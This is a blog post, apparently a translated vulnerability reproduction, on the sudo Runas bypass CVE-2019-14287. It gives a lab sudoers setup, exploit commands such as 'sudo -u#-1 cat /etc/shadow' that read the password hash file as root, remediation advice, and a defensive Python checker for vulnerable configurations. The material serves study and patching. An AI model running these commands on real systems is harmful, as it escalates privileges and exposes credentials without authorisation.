[Privilege escalation] Reproducing the sudo privilege escalation (CVE-2019-14287)

On October 14, 2019, the sudo project officially issued a vulnerability alert, numbered CVE-2019-14287.

0x00 About

sudo is a user access control / user switching program integrated into essentially all Unix-like operating systems (BSD, macOS, GNU/Linux). It allows administrators to control which users a given user may switch to on a server.

0x01 Vulnerability Overview

The vulnerability is a sudo security policy bypass that can allow a malicious program or user to execute arbitrary commands as root on the target Linux system. Personally, I feel the vulnerability is of limited practical value, because triggering it requires a special configuration, and a default Linux installation has no security problem.

0x02 Affected Versions

Sudo versions < 1.8.28

0x03 Environment Setup

Any Linux machine with a sudo version < 1.8.28 will do; the version can be obtained by running sudo -V

The environment used here is sudo 1.8.16

Since a specific configuration is required, first modify the sudoers configuration file (located at /etc/sudoers)

Under the root ALL=(ALL:ALL) ALL line, add the following configuration:

test    ALL=(ALL,!root) ALL

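1. test is the user name
2. The first ALL means the user is allowed to use sudo on any machine or terminal
3. (ALL,!root) in the parentheses means commands may be run as any user except root
4. The last ALL specifies the commands that are allowed to be executed (all of them)

Adding this line means that the user test can use sudo to run commands as any user except root.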

0x04 Exploitation

1. First, switch to the test user:

su test

2. Run the following command; it fails:

sudo whoami

3. Run sudo -u#id whoami

Any id can be tried here; I picked test's own id from /etc/group: 1001

The following command succeeds:

sudo -u#1001 whoami

The following command also succeeds:

sudo -u#-1 whoami

4. Try a more privileged operation

This command fails:

cat /etc/shadow

This command succeeds:

sudo -u#-1 cat /etc/shadow

5. Explanation:

sudo -u#id runs a command as the user with the specified numeric id. Because the id can be specified freely, -u#-1 or -u#4294967295 can be used to bypass the restriction and execute arbitrary code as root. This works because the sudo command itself is already running as user ID 0, so when sudo attempts to change the user ID to -1, no change occurs. As a result, the sudo log entry reports the command as run by user ID 4294967295 rather than by root (user ID 0).

0x05 Remediation

Update sudo to version 1.8.28
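
One way to check a host for the precondition described in sections 0x02 and 0x03, as an added example that is not part of the original post: it flags sudoers rules whose Runas list grants ALL while negating root, and reports them only when the sudo -V output shows a version below 1.8.28. The function names and sample inputs are assumptions constructed for illustration; Runas_Alias expansion and #include files are not resolved.

```python
import re

FIXED = (1, 8, 28)  # first fixed release, as stated on this page
# Captures the user part of a Runas spec: (users) or (users:groups)
RUNAS = re.compile(r"\(([^):]*)(?::[^)]*)?\)")

def parse_version(sudo_v_output):
    """Extract (major, minor, patch) from the output of `sudo -V`."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if not m:
        raise ValueError("no sudo version found")
    return tuple(int(x) for x in m.groups())

def risky_rules(sudoers_text):
    """Return rules whose Runas user list contains ALL plus a negated root."""
    text = re.sub(r"\\\r?\n", " ", sudoers_text)  # join continuation lines
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        # Skip blanks, comments (this also skips #include) and Defaults lines
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        for spec in RUNAS.findall(line):
            users = [u.replace(" ", "") for u in spec.split(",")]
            if "ALL" in users and any(u in ("!root", "!#0") for u in users):
                hits.append(line)
                break
    return hits

def exposed(sudo_v_output, sudoers_text):
    """Risky rules matter only when the installed sudo predates the fix."""
    if parse_version(sudo_v_output) >= FIXED:
        return []
    return risky_rules(sudoers_text)

# Constructed sample inputs (not taken from a real host)
SAMPLE_SUDOERS = """\
# constructed sample
root    ALL=(ALL:ALL) ALL
test    ALL=(ALL,!root) ALL
ops     ALL=(www-data) /usr/bin/systemctl
"""
SAMPLE_VERSION = "Sudo version 1.8.16\nSudoers policy plugin version 1.8.16"

if __name__ == "__main__":
    for rule in exposed(SAMPLE_VERSION, SAMPLE_SUDOERS):
        print("review this rule:", rule)
```

Distribution packages may carry a backported fix under an older version string, so treat the version comparison as a first pass and confirm against the vendor's advisory.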


Origin www.cnblogs.com/-mo-/p/11683402.html